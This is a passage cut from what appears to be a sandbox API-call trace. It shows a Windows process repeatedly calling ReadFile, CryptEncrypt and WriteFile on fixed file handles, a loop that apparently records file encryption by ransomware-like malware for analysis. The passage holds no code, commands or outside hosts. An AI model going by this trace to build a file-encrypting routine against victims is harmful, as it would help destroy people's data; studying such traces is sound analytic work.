nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.138] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.138] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.140] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.140] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.141] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.141] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.142] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.142] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.143] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.143] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.144] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.144] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.145] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.145] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.146] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.146] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.147] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.147] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.148] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.148] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 